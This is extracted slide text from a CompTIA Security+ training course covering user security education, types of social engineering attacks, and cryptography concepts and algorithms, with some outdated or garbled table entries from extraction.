–Medical records, financial information, employee file
• What PII that is and is not protected can be found in the company's privacy policy
Personally Identifiable Information (PII)
CompTIA Security+ Training
User Education
• Users must safeguard customer and employee PII against identity theft
• Educate users on
–Regulatory policies and procedures concerning PII
–Examples of PII breaches in the news
–The latest scams that target PII to be aware of
Personally Identifiable Information (PII)
CompTIA Security+ Training
User Education
• Users should not post sensitive company information on social networking sites
• Malware, XSRF, phishing, and other attacks are common on social networking sites
• Shortened URLs can lead anywhere
Social Networking
CompTIA Security+ Training
User Education
• Ban and disable on company devices
• Train users on the dangers of personal use
• Why?
–Music or other file sharing sites are ripe with malware downloads
–Pirated software is not allowed on company assets
–An avenue for data breaches
• Accidently or by malicious insiders
Peer to Peer (P2P) File Sharing
CompTIA Security+ Training
User Education
• Password behaviors
–Don’t use dictionary words or anything associated with the user
–Don’t use the same password for multiple accounts
• Clean desk policies
–Employees are responsible for clearing their workspace of sensitive papers when they leave the office
–Have a clearly stated policy that users read and sign
User Habits
CompTIA Security+ Training
User Education
• Data handling
–Encrypt data before emailing, putting on removable media, or using unsecured file transfer protocols
–Store files in the appropriate place on the network
–Take care that only authorized people see printouts and faxes
–Properly label and dispose of data
–Don’t share credentials or ID badges with anyone
• Safe computing
–Connecting to wireless networks
–Being aware of spoofing and phishing
–Downloading files and attachments
User Habits
CompTIA Security+ Training
User Education
• Personally owned devices
–The most secure method would be to not allow personal devices
• Proprietary data can be leaked
• Malware can be introduced
– If devices are allowed the acceptable use policy needs to clearly spell out rules and restrictions
• Extensive awareness training needs to be done
• Couple with data loss systems and other security controls
User Habits
CompTIA Security+ Training
User Education
• Sensitivity of data
–Different data is more sensitive that other data
–Hard vs. soft
–Use different classifications to label data sensitivity levels
• Government: Unclassified, Sensitive, Confidential, Secret, Top Secret
• Public, Internal, Confidential, Secret
• Data availability classifications
– Labels can also be created based on how imperative data is to critical business functions
Information Classification
CompTIA Security+ Training
User Education
Information Classification
Information Security Scheme
• Examples
Public Internal Confidential Secret
Viewable By Everyone Select
Employees Select
Employees Select
Leadership
Data Integrity Desired Required Required Vital
Impact of Disclosure
Acceptable Inconvenience Damaging Catastrophic
Impact of Loss Acceptable Inconvenience Damaging Catastrophic
Value to Competitor
Minimal Interesting Significant
Gain Significant
Gain
CompTIA Security+ Training
User Education
Information Classification
Nice to Have
Important Very
Important Mission Critical
Downtime 1 Week 2 Days 8 Hours 1 Hour
Hours N/A 6 am – 6 pm 6 am – 6 pm 24h x 7d
% Available 70% 85% 95% 99.99%
Information Availability Scheme
• Examples
CompTIA Security+ Training
User Education
• Labeling
–Clearly label data media used for backup, archival, and transport
• Handling
–Have a clean desk policy and other hard data policies
–Users should not share their credentials
• Disposal
–Decommissioning devices
• What is data and information on the device worth?
• Physically destroy
–Deleting old data
• Secure wipe using a specialized utility
–Shred paper copies
Data Labeling, Handling, and Disposal
CompTIA Security+ Training
User Education
Key Terms You Should Know
Term Definition
Personally Identifiable Information (PII)
Information that can be used to identify a person or be linked to a person
Clean Desk Policy
A policy that states that employees must have their workspace cleared of any sensitive company information before leaving the office
Peer to Peer (P2P) File Sharing
Clients share media files through an interconnected network of nodes with no centralized server
CompTIA Security+ Training
User Education
What We Covered
Security Policy Training and Procedures
• Compliance with Laws, Best Practices, and Standards
Threat Awareness
• New Viruses
• Phishing Attacks
• Zero Day Exploits
Regulatory Compliance
Personally Identifiable Information
Social Networking
Peer to Peer (P2P) File Sharing
CompTIA Security+ Training
User Education
What We Covered
User Habits
• Password Behaviors
• Data Handling
• Clean Desk Policies
• Personally Owned Devices
Information Classification
Data Labeling, Handling, and Disposal
CompTIA Security+ Training Instructor: Lisa Szpunar
Social Engineering
CompTIA Security+ Training
Social Engineering
In This Lesson:
Exam Objective: 3.3 Analyze and differentiate among
types of social engineering attacks
Social Engineering Overview
Impersonation
Tailgating
Dumpster Diving
Shoulder Surfing
Phishing
• Vishing
• Spear Phishing
• Whaling
Hoaxes
Reverse Social Engineering
CompTIA Security+ Training
Social Engineering
• Manipulating people into performing actions or divulging information
• Varied techniques used by attackers
–Both technical and non-technical
• Technical controls are useless if users can be convinced to bypass them for attackers
Social Engineering Overview
CompTIA Security+ Training
Social Engineering
• Why social engineering works
– Fear
– Laziness
–Desire to obtain free awards or money offered
–Wanting to be helpful
–Flattery or distraction
– Lack of awareness
Awareness and education
• Policies and procedures
• Mandatory training
• Continued follow-up
Social Engineering Overview
CompTIA Security+ Training
Social Engineering
• On the phone
– Fellow employee or the boss
–Authority figure like a fire marshal
–Survey taker
–Customer
Define what information should never be told over the phone
• In person
–Maintenance person
–Delivery person
Train users to check credentials and verify that all outside people are allowed to enter. Escort non-employees while in the building
Impersonation
Tailgating Tailgating
• A person follows someone past a security checkpoint without using their own credentials
• Also called piggybacking
–The term piggybacking sometimes accompanies consent while tailgating is done without consent
• Methods
–Confidently following the authorized person past the door after they have swiped in
–Blending in with a large crowd
–Having full hands so that someone will hold open the door
–Convincing an authorized person that the unauthorized person has forgotten or lost their ID
Train employees to insist that every person authenticates
Tailgating
Dumpster Diving
Dumpster Diving
• Someone looking through the trash or recycling to gain information
–Passwords
–Details an “insider” would know to use in future attacks
• Have a proper disposal policy
–Third-party disposal companies are available to securely throw away or recycle trash
Train users to follow the paper shredding and media/equipment disposal policy
CompTIA Security+ Training
Social Engineering Shoulder Surfing
Shoulder Surfing
• Directly observing unauthorized information
–Password
–Pin number
• Attacker must have physical access
• Eavesdropping
– Listening in on a conversation to gain information
• Snooping
– Looking through files and papers to gain information
– Looking under your keyboard or other obvious places for passwords
Train employees to be aware of their surroundings
CompTIA Security+ Training
Social Engineering
• Trying to get personal information by pretending to be a trusted person, company, or website
• Often comes as email
–Reply to email with personal info
–Click on a link
–Call “customer service” representative on the phone
• Uses logos and color schemes to try to mimic the legitimate entity
• Tries to create a sense of urgency or fear
Train users to never follow instructions in an email without verifying that it isn't a scam first
Phishing
Phishing Example
CompTIA Security+ Training
Social Engineering
• Sub-types of phishing
Phishing
Whaling
Spear phishing targeted at executives or people with access to especially sensitive information
Vishing
Phishing over VoIP
Spear Phishing
Using information specific to a person/company to make a phishing attempt seem more legitimate
CompTIA Security+ Training
Social Engineering
• Chain emails or social media that contain misinformation
• Wastes time and resources
– Lost productivity
–Email database space and backups
–Paper printouts
• Concerned and frightened users will notify IT staff
• Stay abreast of current hoaxes
• Use spam filters to filter hoax emails from getting to users
Train users on how to check if a email is a hoax
• Snopes
• Antimalware vendors
>>>>>Hoaxes
CompTIA Security+ Training
Social Engineering
• The attacker makes themselves interesting or available to the victim
–Most common example is offering help for a future problem
• The victim contacts the attacker and readily offers information
–The victim calls or emails the “helper” to ask for help to fix a problem
• Other social engineering methods or reconnaissance are done first to set up for the reverse attack
Train users to verify that anyone that offers help does in fact work for the company
Reverse Social Engineering
CompTIA Security+ Training
Social Engineering
Key Terms You Should Know
Term Definition
Social Engineering Deceiving a person into revealing confidential information or performing a task
Impersonation In regards to social engineering, the attacker pretends to be someone who is authorized
Tailgating
A person follows an authorized person through a security checkpoint (like a door with a scan card reader) without authenticating themselves
Dumpster Diving Looking through trash for details about an organization
CompTIA Security+ Training
Social Engineering
Key Terms You Should Know
Term Definition
Shoulder Surfing Observing confidential information like a password being typed in
Hoaxes
Misinformation that leads to wasting of time and resources. Normally comes in the form of emails or in social media
Reverse Social Engineering
The victim is lured into contacting the attacker resulting in a higher amount of trust for the attacker. This is normally done by offering help or gifts
CompTIA Security+ Training
Social Engineering
What We Covered
Social Engineering Overview
Impersonation
Tailgating
Dumpster Diving
Shoulder Surfing
Phishing
• Vishing
• Spear Phishing
• Whaling
Hoaxes
Reverse Social Engineering
CompTIA Security+ Training Instructor: Lisa Szpunar
Cryptography Concepts
CompTIA Security+ Training
Cryptography Concepts
In This Lesson:
Exam Objective: 6.1 Summarize general cryptography concepts
Cryptography Overview
Symmetric vs. Asymmetric Encryption
Digital Signatures
Non-repudiation
Encryption/Decryption Methods
• Block Cipher
• Stream Cipher
• Elliptic Curve Cryptography (ECC)
• Quantum Cryptography
Cryptographic Hashing
Transport Encryption
Steganography
Use of Proven Technologies
CompTIA Security+ Training
Cryptography Concepts
• What is Cryptography?
–The science and study of hiding information
• Hiding information by converting plaintext into ciphertext (encryption)
• Then back from ciphertext to plaintext (decryption)
Cryptography Overview
If you can dream and not make dreams your master; If you can think and not make thoughts your aim, If you can meet with Triumph and Disaster And treat those two impostors just the same: If you can
Plaintext
If you can dream and not make dreams your master; If you can think and not make thoughts your aim, If you can meet with Triumph and Disaster And treat those two impostors just the same: If you can
Plaintext
ec40619a9ebccd6ce2b5ef1a256e03eb697aaa34aad84ae9d0fff1817e9a7bddab3a5c8083dcf449bf53b8f14c5f05006576a223b26b36372619e249509d1413504fd67d878ee3e323cfdede6f2e41
Ciphertext
Key
Encryption Algorithm
Key
Decryption Algorithm
CompTIA Security+ Training
Cryptography Concepts
• Benefits of cryptography
–Confidentiality
• Protecting data in transit
• Protecting data at rest
–Non-repudiation and authentication
• A message encrypted with your private key or signed with your digital signature had to come from you
Cryptography Overview
CompTIA Security+ Training
Cryptography Concepts
• Benefits of cryptography
–Access control
• With symmetric encryption only the secret key holder can decrypt the ciphertext
• With asymmetric encryption a digital certificate can be used for authentication and thus access control
– Integrity
• Message digests can be used to know if a message was tampered with during transit
Cryptography Overview
CompTIA Security+ Training
Cryptography Concepts
• How cryptography works
–A cipher and a key(s)
• An algorithm encrypts data by applying a key to plaintext
• Another algorithm decrypts data by applying a key to ciphertext
–Different ciphers/algorithms are stronger than others
– Longer keys make stronger encryption
• 40-bit key is not secure
• Classic ciphers
–Substitution ciphers
–Transposition ciphers
Cryptography Overview
Substitution Cipher Example
A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
G H I J K L M N O P Q R S T U V W X Y Z A B C D E F
ROT6 Caesar Substitution Cipher
Plaintext: asparagus
Ciphertext: gyvgxgmay
CompTIA Security+ Training
Cryptography Concepts
• Symmetric Encryption
–The same secret key is used for encryption and decryption
• Key management is the biggest concern
– Getting the secret key securely to both parties
– Keeping the key a secret
–Generally faster than asymmetric encryption alone
–Strength is effected by
• Length of the key
• Number of iterations through the algorithm
–Vulnerable to brute force attacks
Symmetric vs. Asymmetric Encryption
CompTIA Security+ Training
Cryptography Concepts
• Asymmetric Encryption
–A key pair is used: one key is used for encryption and the other for decryption
• Public key is publicly available
• Private key must be kept secret
–Either key can encrypt and either key can decrypt
• Encrypt with public decrypt with private
• Encrypt with private decrypt with public
• Messages encrypted with private cannot be decrypted with private
• Messages encrypted with public cannot be decrypted with public
Symmetric vs. Asymmetric Encryption
CompTIA Security+ Training
Cryptography Concepts
• Digitally sign data and messages
• Provides authenticity, non-repudiation, and integrity
• Confirms that the data or message you have received is from who it says it is from
• Confirms that the message was not altered during transit
Digital Signatures
CompTIA Security+ Training
Cryptography Concepts
–Assuring that the author of a message can not later refute the fact that they sent that message
–Extra non-repudiation services can be built in to encryption and digital signatures
• Proof of origin
• Proof that the data has been received and received correctly
–Does not account for unauthorized physical access
• Sending a message from someone else’s computer
Non-repudiation
CompTIA Security+ Training
Cryptography Concepts
• Block cipher
– Fixed length chunks of bits (blocks) are encrypted
–Blocks can be padded if the data is too short
–Result is the same sized blocks of ciphertext
–Use initialization vectors to avoid reusing symmetric keys
–A good block cipher does not allow someone to deduce the key from looking at the ciphertext
Encryption/Decryption Methods
Secret Key
Block Cipher
If you can dream and not make dreams your master; If you can think and not make thoughts your
aim, If you can meet with Triumph and Disaster And treat those two impostors just the same: If
you can bear to hear the truth you've spoken Twisted by knaves to make a trap for fools, Or watch the
03bab3582044427ecc114c9601acc97814c63096338f76e8b290c8662c9f9d7451270bd8bcfc2ace029a7f
4293922215717bfc2f6c0fffab1fb0e85a7826d2a1d1bc19e818c420b9502e59ace94bc5e3fc1f230ed90012
22945c54ec8bad1f6e292c3c1bbef4df8035ed22e8a64be498ad30302c741f79d56af4f70acf90ccd80200eb
CompTIA Security+ Training
Cryptography Concepts
• Stream cipher
–Symmetric key
–A continuous stream of bits/bytes are encrypted one at a time
– Faster and uses less processing power than block ciphers
–Pseudorandom keyspace generators will repeat eventually
• The longer the period of time before a repeat the better
Encryption/Decryption Methods
Secret Key
Stream Cipher
CompTIA Security+ Training
Cryptography Concepts
• Elliptic curve cryptography (ECC)
–Asymmetric keys
–Has a compact mathematical design that allows stronger encryption with shorter keys
–Uses elliptical curves instead of integers as keys
–Used in many varied implementations including mobile devices
Encryption/Decryption Methods
CompTIA Security+ Training
Cryptography Concepts
• Quantum cryptography
–An emerging and expensive concept that is still being researched
–When we measure data we disturb the data
• When you inspect polarized photons you change their polarization
–Quantum cryptography allows us to tell if data was eavesdropped on during transit
• Polarize the photons in one direction for 0 and another direction for 1
–One implementation is quantum key distribution
Encryption/Decryption Methods
CompTIA Security+ Training
Cryptography Concepts
• Hashing algorithms create a unique numeric hash value that is a summary or digest of a message
• One way only
–You can not get plaintext from a hash
• Used for integrity: if data is modified then a different hash value will result
–Message digest (another name for the hash value)
–Digital signatures
–Message authentication codes (MAC)
• Used for password storage
–Allows passwords to be stored securely
–Check the hash of the entered password against the stored hash
Cryptographic Hashing
CompTIA Security+ Training
Cryptography Concepts
• A mathematical function that takes any sized blocks of data and returns fixed-sized bit streams
Cryptographic Hashing
Digital Signatures and Hashing
#
Sent to Recipient
Message Hash Function
# Hash
Encrypt with Sender’s
Private Key
Digital Signature
# #
Decrypt with Sender’s
Public Key
Hash Function
Compare Hashes
Attach Signature to
Message
CompTIA Security+ Training
Cryptography Concepts
• Encryption is used to protect transmissions that pass over the public internet
–VPN
• IPSec
–Web browser / web server communication
• TLS/SSL
• HTTPS
–Data transfer and remote management
• SSH
Transport Encryption
CompTIA Security+ Training
Cryptography Concepts
• Hiding or embedding one message within another
• The main purpose is to not draw attention
• Text can be hidden in image, audio, or video files
–One method for image steganography involves using the last bit in the color code of each pixel to hide the message
–Can encrypt data before and/or after the message is hidden
• Sometimes called electronic watermarking when referring to labeling an image for anti-piracy purposes
• Steganography tools are readily available
–Often used for illicit activities like data theft
Steganography
CompTIA Security+ Training
Cryptography Concepts
• Only use algorithms that, as of today, are considered strong
–Think about the tradeoff between security, speed, and ease of implementation
• Stay informed on cryptography news
– In the past widely used algorithms were “broken”
–New methods are being developed all the time
• Leverage strong encryption with good key management
Use of Proven Technologies
CompTIA Security+ Training
Cryptography Concepts
Key Terms You Should Know
Term Definition
Cryptography The science and study of the methods and procedures for encrypting and decryption data
Cipher or Cypher The pair of algorithms that encrypt and decrypt the data
Key A string of bits used by a cryptographic algorithm during the encryption/decryption process
Plaintext The original unencrypted data or message
Ciphertext or Cyphertext
The data after it has been encrypted. Data is not useable in this form
CompTIA Security+ Training
Cryptography Concepts
Key Terms You Should Know
Term Definition
Non-repudiation A method of assuring that the author of a message can not later refute the fact that they sent a message
Symmetric Encryption Encryption/decryption using a single shared secret key
Asymmetric Encryption Encryption/decryption using a mathematically related key pair
Block Cipher A symmetric encryption method that processes data in fixed-length blocks
Stream Cipher A symmetric encryption method that processes data one bit or byte at a time
CompTIA Security+ Training
Cryptography Concepts
Key Terms You Should Know
Term Definition
Elliptic Curve Cryptography
An asymmetric encryption method that uses elliptical curves to achieve stronger and faster encryption with shorter key lengths
Quantum Cryptography An encryption method that uses physics instead of mathematics
Transport Encryption Encrypting data for protection during transit
Hashing One way encoding that is used for data integrity
Digital Signature
Used to electronically sign a message so that the receiver can verify the sender’s identify and confirm that the message was not altered during transit
CompTIA Security+ Training
Cryptography Concepts
What We Covered
Cryptography Overview
Symmetric vs. Asymmetric Encryption
Digital Signatures
Non-repudiation
Encryption/Decryption Methods
• Block Cipher
• Stream Cipher
• Elliptic Curve Cryptography (ECC)
• Quantum Cryptography
Cryptographic Hashing
Transport Encryption
Steganography
Use of Proven Technologies
CompTIA Security+ Training Instructor: Lisa Szpunar
Cryptography Tools
CompTIA Security+ Training
Cryptography Tools
In This Lesson:
Symmetric Encryption
DES
3DES
AES
RC4
Blowfish
Twofish
Asymmetric Encryption
Diffie-Helman
RSA
ECC
CompTIA Security+ Training
Cryptography Tools
In This Lesson:
Cryptographic Hashing
SHA
MD5
RIPEMD
HMAC
Transport Encryption
SSL/TLS and HTTPS
SSH
IPSec
CompTIA Security+ Training
Cryptography Tools
In This Lesson:
Exam Objective: 6.2 Use and apply appropriate
cryptographic tools and products
Wireless Encryption
WEP vs. WPA/WPA2
Wi-Fi Authentication
Other Encryption Tools
PGP/GPG
One-time Pads
CHAP and PAP
NTLM and NTLMv2
Whole Disk Encryption
Comparative Strengths of Algorithms
Data Confidentiality Algorithms
Data Integrity Algorithms
Symmetric Encryption
CompTIA Security+ Training
Cryptography Tools
Data Encryption Standard
• Used For
–Data confidentiality
• How It Works
–Key is broken into 16 subkeys
–Each of the 16 rounds or Feistel cycles use a different subkey
–Each round has a substitution phase and a permutation (scrambling) phase
DES
Key Length
64-bit
(8 bits of parity)
Block Size
64-bit
CompTIA Security+ Training
Cryptography Tools
Data Encryption Standard
• History
–One of the oldest encryption standards
–Selected to be the official U.S. encryption in 1979
• Security Considerations
–Very vulnerable to brute force attacks
–Not secure by today’s standards
• Can be cracked within a day’s time
DES
Key Length
64-bit
(8 bits of parity)
Block Size
64-bit
CompTIA Security+ Training
Cryptography Tools
Triple Data Encryption Standard
• Used For
–Data confidentiality
• How It Works
–Uses three rounds of DES
• Either three different keys or two alternating keys
–3 times slower than DES
• History
–Created to increase the strength of DES
• Security Considerations
–Still in use but less secure than AES
3DES
Key Length
168-bit
Block Size
64-bit
DES with Key 1
DES with Key 1
DES with Key 2
Ciphertext
Plaintext
CompTIA Security+ Training
Cryptography Tools
Advanced Encryption Standard
• Used For
–Data confidentiality
–WPA2
–Can be used in low processing power implementations
• How It Works
–The 128-bit block is broken into 4 parts
–Uses iterative rounds instead of Feistel rounds
–Number of rounds depends in the key size
AES
Key Length
128-bit
192-bit
256-bit
Block Size
128-bit
CompTIA Security+ Training
Cryptography Tools
Advanced Encryption Standard
• History
–The Rijndael algorithm became the U.S standard for encryption in 2002
• Security Considerations
–Considered strong by today’s standards
AES
Key Length
128-bit
192-bit
256-bit
Block Size
128-bit
CompTIA Security+ Training
Cryptography Tools
Rivest Cipher 4
• Used For
–Data confidentiality
–SSL and WEP
• How It Works
–Stream cipher
RC4
Key Length
40 to 204-bit
CompTIA Security+ Training
Cryptography Tools
Rivest Cipher 4
• History
–Developed by Ron Rivest in 1987
–Ron Rivest has several different ciphers RC1-RC6
–RC4 has been the most widely used stream cipher
• Security Considerations
–Not in use much today
–Different implementations are more secure than others
• It all comes down to the key
RC4
Key Length
40 to 204-bit
CompTIA Security+ Training
Cryptography Tools
• Used For
–Multipurpose
• How It Works
– Fast block cipher
–Uses 16 Feistel rounds
–Very complex key schedule
• History
–Produced by Bruce Schneier
–Unpatented since its creation
• Security Considerations
– Fewer than 16 Feistel rounds are vulnerable to attack
–Considered strong if implemented correctly
Blowfish
Key Length
1 to 448-bit
Block Size
64-bit
CompTIA Security+ Training
Cryptography Tools
• Used For
–Multipurpose
• How It Works
– Fast block cipher
–Uses 16 Feistel rounds
–Very complex key schedule
• History
–Also created by Bruce Schneier with help from other cryptographers
–Was in contention to become AES
• Security Considerations
– Fewer than 16 Feistel rounds are vulnerable to attack
–Considered strong if implemented correctly
Twofish
Key Length
128 to 256-bit
Block Size
128-bit
Asymmetric Encryption
CompTIA Security+ Training
Cryptography Tools
Named for Whitfield Diffie and Martin Hellman
• Used For
–Key exchange
• Lets two (or more) parties that don’t know each other to establish a jointly shared secret key
• How It Works
–Easy to compute but hard to reverse
• History
–The original public/private concept
• Security Considerations
–No authentication by itself
Key Length
Variable
Diffie-Hellman
CompTIA Security+ Training
Cryptography Tools
Named for Ron Rivest, Adi Shamir, and Leonard Adleman
• Used For
–Key exchange
–Data confidentiality and digital signatures
• How It Works
–Uses two large prime integers
• It is easy to find the product of the two primes but hard to find the primes from the product
–100 times slower than DES
• History
–Published in the late 1970s
• Security Considerations
–Problems arise when using prime numbers that are too small
RSA
Key Length
1,024 to 4,096-bit
CompTIA Security+ Training
Cryptography Tools
Elliptic Curve Cryptography
• Used For
–Smaller less powerful devices like
• How It Works
–An elliptic curve and one point of the curve is chosen and made public
–Multiplying the chosen point on the curve by a secret number will produce another point on the curve
• It is very difficult to find out what number was used
ECC
Key Length
Variable
CompTIA Security+ Training
Cryptography Tools
Elliptic Curve Cryptography
• History
–A cryptography concept with many implementations
–Many companies have their own version of ECC
• Security Considerations
–Still being studied but currently considered strong if parameters are chosen properly
ECC
Key Length
Variable
Cryptographic Hashing
Collisions
d131dd02c5e6eec4693d9a0698aff95c 2fcab50712467eab4004583eb8fb7f89
55ad340609f4b30283e4888325f1415a 085125e8f7cdc99fd91dbd7280373c5b
d8823e3156348f5bae6dacd436c919c6 dd53e23487da03fd02396306d248cda0
e99f33420f577ee8ce54b67080280d1e c69821bcb6a8839396f965ab6ff72a70
d131dd02c5e6eec4693d9a0698aff95c 2fcab58712467eab4004583eb8fb7f89
55ad340609f4b30283e488832571415a 085125e8f7cdc99fd91dbdf280373c5b
d8823e3156348f5bae6dacd436c919c6 dd53e2b487da03fd02396306d248cda0
e99f33420f577ee8ce54b67080a80d1e c69821bcb6a8839396f9652b6ff72a70
79054025255fb1a26e4bc422aef54eb4
Input A
Input B
Same Hash Value
Example Collision for MD4
CompTIA Security+ Training
Cryptography Tools
Secure Hash Algorithm
• Used For
–Digital signatures
• How It Works
–Breaks the message into words and groups the words into blocks before processing for 64 or 80 rounds
–SHA-2 is the current version that outputs a 256-bit hash length or longer
–The longer hash length version (SHA-512) accepts larger inputs and process larger block sizes
SHA
Hash Length
256-bit
512-bit
Block Size
512-bit
1024-bit
SHA-256
SHA-512
CompTIA Security+ Training
Cryptography Tools
SHA
Secure Hash Algorithm
• History
–Designed and published by NSA and NIST
–SHA-1 used 160-bit hash and has been replaced with SHA-2
–The SHA-3 algorithm has not been chosen from the finalists
• Security Considerations
–SHA-1 has been found to have collisions
Hash Length
256-bit
512-bit
Block Size
512-bit
1024-bit
SHA-256
SHA-512
CompTIA Security+ Training
Cryptography Tools
Message Digest 5
• Used For
–Message digest
• How It Works
–Breaks the message into 512-bit blocks with a mandatory 64-bits of padding
–Then breaks the blocks into 32-bit chunks
–Does 4 rounds of processing
MD5
Hash Length
128-bit
Block Size
512-bit
CompTIA Security+ Training
Cryptography Tools
Message Digest 5
• History
–Developed in 1991
–Others in the series are MD2, MD4, and, MD6
–MD5 is slightly slower but more secure than MD4
• Security Considerations
–Collisions are possible and is not considered secure
MD5
Hash Length
128-bit
Block Size
512-bit
CompTIA Security+ Training
Cryptography Tools
RACE Integrity Primitives Evaluation Message Digest
• Used For
–Message digest
• How It Works
–Three rounds of processing on block of variable sizes
• History
–RIPEMD is based on MD4 and RIPEMD-160 is based on MD5
• Security Considerations
• The 128-bit version was found to have collisions
• Higher hash outputs than 160 are in use but are no stronger than the 160-bit version
RIPEMD
Hash Length
160-bit or 128-bit (unsecure)
Block Size
Variable
CompTIA Security+ Training
Cryptography Tools
Hash-based Message Authentication Code
• Used For
–Message authentication codes
• Data integrity and authentication
• How It Works
–Use a hashing function with a secret key
–Can use MD5 or SHA
• Example: If SHA-256 is used the result is referred to as HMAC-SHA256
HMAC
CompTIA Security+ Training
Cryptography Tools
Hash-based Message Authentication Code
• Security Considerations
–The strength of HMAC depends on the hashing function used and the length of the key
• The addition of the secret key makes HMAC stronger than the hashing function alone
HMAC
Transport Encryption
CompTIA Security+ Training
Cryptography Tools
Secure Sockets Layer / Transport Layer Security and
Hypertext Transfer Protocol Secure
• Used For
–SSL/TLS allows HTTPS and other client/server applications to communicate securely across an unsecure network
• Offers protection from eavesdropping, tampering, and message forgery
• How It Works
–TLS uses a handshake for both parties to authenticate and agree on parameters including a symmetric key
SSL/TLS and HTTPS
CompTIA Security+ Training
Cryptography Tools
Secure Sockets Layer and Transport Layer Encryption Security
• History
–SSL was created by Netscape
–TLS improved on and superseded SSL
• Security Considerations
–Only as strong as the ciphers and hashing agreed upon by both sides
SSL/TLS and HTTPS
CompTIA Security+ Training
Cryptography Tools
Secure Shell
• Used For
–Secure remote sessions, file transfers, tunneling, port forwarding, and more
• How It Works
–Uses a handshake to set up parameters and performs a key exchange
• Security Considerations
–Only as strong as the ciphers and hashing algorithms agreed upon by both sides
SSH
CompTIA Security+ Training
Cryptography Tools
Internet Protocol Security
• Authentication Header (AH)
– Digitally signs the packets for authentication and integrity
• Before a packet is sent hash is taken of the packet plus the shared secret key
• That hash is added to the header and the packet is sent
• On the recipient's end the message payload and the secret key are hashed again
• If the original hash and the new hash match we have authentication and integrity
IPSec Payload AH Original
IP Header
TCP
CompTIA Security+ Training
Cryptography Tools
Internet Protocol Security
• Encapsulating Security Payload (ESP)
– Adds confidentiality and optionally integrity checking
• Adds a header, a trailer, and an integrity check value (ICV)
• Optional ICV works like the AH
• ESP Header includes properties for the packet like a sequence number
• ESP Trailer is for padding
IPSec
Payload ESP
Header
Original IP
Header TCP
ESP Trailer
ESP Authentication
Wireless Encryption
WEP vs. WPA/WPA2
WEP WPA WPA2
Algorithm RC4 RC4 AES
Key Size 64-bit or 128-bit 128-bit 128 bit
Added Security
None TKIP CCMP
Weakness Can be cracked in a matter of hours
TKIP is vulnerable to spoofing
Denial of Service
Strength
Uses an IV and a second key to produce dynamic per-packet keys
48-bit initialization vector
Integrity Check
Cyclic redundancy check
Message integrity check
Backward Compatible
N/A Yes No
CompTIA Security+ Training
Cryptography Tools
• Pre-shared Key (PSK)
–WPA-Personal
– Intended for personal or home networks
–A key must be configured on the client devices that matches the key on the access point
–All the clients share a key
• WEP: It is possible to derive the key from capturing packets
• WPA: Uses this key to generate the dynamic keys
– This method is still vulnerable especially if a weak passphrase is chosen as the pre-shared key
Wi-Fi Authentication
CompTIA Security+ Training
Cryptography Tools
• Enterprise Authentication
–WPA-Enterprise
–Uses 802.1x and a RADIUS or another authentication server to handle authentication
Wi-Fi Authentication
Other Encryption Tools
CompTIA Security+ Training
Cryptography Tools
Pretty Good Privacy and GNU Privacy Guard
• Used For
–An encryption system most often used for email
• Data confidentiality, authentication, and digital signatures
• How It Works
–Uses several algorithms
• Both symmetric and asymmetric encryption
–Both ends of communication need a PGP/GPG client
–Creates a web of trust with certificates
• A certificate binds a key to its owner
• If you trust a person and their certificate you sign their cert
• You can trust the certs signed by the people you trust
PGP/GPG
CompTIA Security+ Training
Cryptography Tools
Pretty Good Privacy and GNU Privacy Guard
• History
–PGP was introduced in the 1991 and is commercially available
–GPG was originally released in 1999 and does not use any restricted or patented algorithms by default
• Security Considerations
–Pretty good!
PGP/GPG
CompTIA Security+ Training
Cryptography Tools
• Used For
–Data confidentiality
• How It Works
–A shared secret key (pad) is used that is the same length as the message
• The key is a completely random string of text therefore the keyspace is infinite
–The characters in the key are added one by one to the message characters (numeric equivalents)
–The reverse is done for description
One-time Pads (OTP)
CompTIA Security+ Training
Cryptography Tools
• History
–An old concept that was described in the 1800’s and patented in the early 1900’s
–Used by the U.S. military as an early cryptography tool
• Security Considerations
–Not vulnerable to brute force attacks
One-time Pads (OTP)
CompTIA Security+ Training
Cryptography Tools
Challenge-Handshake Authentication Protocol and
Password Authentication Protocol
• Used For
–Authentication for PPP
• How PAP Works
–Usernames and passwords are sent in cleartext to be checked
CHAP and PAP
CompTIA Security+ Training
Cryptography Tools
Challenge-Handshake Authentication Protocol and
Password Authentication Protocol
• Used For
–Authentication for PPP
• How CHAP Works
–Uses a challenge response procedure to authenticate the client
1. The server sends a string of challenge text to the client
2. The client hashes the challenge string using a shared secret as a key and sends the result back to the server
3. The server compares the hash to a stored hash
CHAP and PAP
CompTIA Security+ Training
Cryptography Tools
Challenge-Handshake Authentication Protocol and
Password Authentication Protocol
• History
–CHAP was specified in RFC 1994
–Microsoft has their own versions called MS-CHAP and MS-CHAPv2
• Security Considerations
–PAP has no encryption and is completely unsecure
–A weak password used as the secret key makes CHAP vulnerable to brute force and dictionary attacks
–Usernames and passwords may be stored in plaintext on the client or server side
CHAP and PAP
CompTIA Security+ Training
Cryptography Tools
NT LAN Manager and NT LAN Manager Version 2
• Used For
–Windows authentication
• NTLM for early versions of Windows NT
• NTLMv2 after Windows NT SP4
• How It Works
–Challenge response
–Uses MD4/MD5 hashing
–NTLMv2 takes additional steps for randomization and security
NTLM and NTLMv2
CompTIA Security+ Training
Cryptography Tools
NT LAN Manager and NT LAN Manager Version 2
• History
–A replacement for LANMAN
• Security Considerations
–NTLM is vulnerable to spoofing attacks
–Still in use for backward compatibility
NTLM and NTLMv2
CompTIA Security+ Training
Cryptography Tools
• Used For
–Data confidentiality
–Protects an entire disk in the event a laptop or other mobile device is lost or stolen
• How It Works
–Uses a key to encrypt everything on the drive including the operating system
– Included on operating system, third party software, USB hardware, HSM, or built into some hard drives
–Some options require a TPM chip
• Security Considerations
– If you lose your key you lose your data
• Some enterprise systems have key recovery options
Whole Disk Encryption
Comparative Strengths of Algorithms
Comparative Strength of Data Confidentiality Algorithms
Algorithm Key Length Mode Should I Use It?
DES 65-bit Block
3DES 168-bit Block K
AES
128-bit
192-bit
256-bit
Block
RC4 Variable Stream
Blowfish 64-bit Block
Twofish 128-bit Block
One-time Pad ≥ Message Length Block K
Comparative Strength of Data Integrity Algorithms
Algorithm Hash Length Rounds Should I Use It?
SHA-1
160-bit 80
SHA-2 256-bit or more 64 or 80
MD5 128-bit 4
RIPEMD Variable 3
RIPEMD-160 160-bit 3 K
HMAC
Dependent on hashing algorithm used
Dependent on hashing algorithm used
CompTIA Security+ Training
Cryptography Tools
What We Covered
Symmetric Encryption
DES
3DES
AES
RC4
Blowfish
Twofish
Asymmetric Encryption
Diffie-Helman
RSA
ECC
CompTIA Security+ Training
